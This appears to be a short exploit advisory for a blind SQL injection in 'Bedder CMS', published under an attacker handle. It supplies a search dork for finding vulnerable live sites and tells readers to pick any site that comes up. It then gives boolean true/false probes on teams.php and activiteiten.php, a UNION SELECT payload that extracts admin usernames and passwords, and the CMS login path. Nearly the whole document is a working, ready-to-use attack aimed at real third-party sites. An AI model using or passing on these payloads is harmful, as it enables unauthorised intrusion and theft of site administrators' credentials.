42 lines
No EOL
1.4 KiB
Text
42 lines
No EOL
1.4 KiB
Text
#(+)Exploit Title: Bedder CMS Blind SQL Injection Vulnerability
|
|
#(+)Author : ^Xecuti0n3r
|
|
#(+) Date : 15.04.2011
|
|
#(+) Hour : 13:37 PM
|
|
#(+) E-mail : xecuti0n3r()yahoo.com
|
|
#(+) dork : intext:"Design by Bedder"
|
|
#(+) Category : Web Apps [Blind SQli]
|
|
|
|
____________________________________________________________________
|
|
____________________________________________________________________
|
|
|
|
Choose any site that comes up when you enter the dork intext:"Design by Bedder" in search engine
|
|
|
|
|
|
*Blind SQL injection Vulnerability*
|
|
|
|
|
|
|
|
# [+]True : http://site.com/teams.php?id=1 and 1=1--
|
|
# [+]False: http://site.com/teams.php?id=1 and 1=2--
|
|
# [+]eViL : http://site.com/teams.php?id=[SQLi]
|
|
|
|
|
|
|
|
# [+]True : http://site.com/activiteiten.php?id=91 and 1=1--
|
|
# [+]False: http://site.com/activiteiten.php?id=91 and 1=2--
|
|
# [+]eViL : http://site.com/activiteiten.php?id=[SQLi]
|
|
|
|
|
|
# [+]Cms Login Page is at : http://site.com/cms/index.php
|
|
|
|
# [+]evIL: teams.php?id=-1+union+select+1,2,concat(autorisatie_gebruikersnaam,0x3a,autorisatie_wachtwoord)+from+autorisatie
|
|
|
|
|
|
|
|
____________________________________________________________________
|
|
____________________________________________________________________
|
|
|
|
########################################################################
|
|
(+)Exploit Coded by: ^Xecuti0n3r
|
|
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
|
|
######################################################################## |